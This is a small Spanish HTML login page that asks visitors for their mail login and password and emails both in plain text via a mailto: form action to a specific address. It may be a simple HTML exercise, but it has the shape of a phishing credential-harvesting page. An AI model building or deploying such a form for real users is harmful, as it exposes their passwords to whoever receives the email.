<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Formulario de Login</title>
</head>
<body>
    <h1>Introduzca su Login</h1>
    <h2>Para acceder a su correo responda lo siguiente:</h2>
    <form action="mailto:alsastre@redestb.es" method="post" enctype="text/plain">
        <p>Introduzca su login :<br>
        <input type="text" name="login" size="20" required><br>
        Introduzca su contraseña :<br>
        <input type="password" name="password" size="20" required></p>
        <p><input type="image" src="login.png" alt="Enviar"></p>
        <p><input type="reset" value="Borrar"></p>
    </form>
</body>
</html>
